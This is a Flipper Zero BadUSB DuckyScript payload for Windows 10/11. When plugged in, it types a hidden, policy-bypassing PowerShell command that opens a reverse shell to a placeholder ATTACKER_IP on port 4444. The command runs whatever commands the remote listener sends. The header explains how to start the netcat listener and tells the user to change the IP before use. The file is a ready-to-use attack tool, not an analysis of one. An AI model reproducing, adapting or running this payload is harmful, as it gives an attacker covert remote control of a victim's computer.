REM ============================================================================
REM  FLLC - BadUSB: PowerShell Reverse Shell
REM  Flipper Zero DuckyScript
REM ============================================================================
REM  Target: Windows 10/11
REM  Time: ~5 seconds
REM  Spawns a reverse PowerShell shell back to your listener
REM  CHANGE THE IP AND PORT BELOW BEFORE USE
REM ============================================================================
REM  Start listener first:  nc -lvnp 4444
REM ============================================================================

DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoP -NonI -Exec Bypass -Command "$c=New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
ENTER
DELAY 500
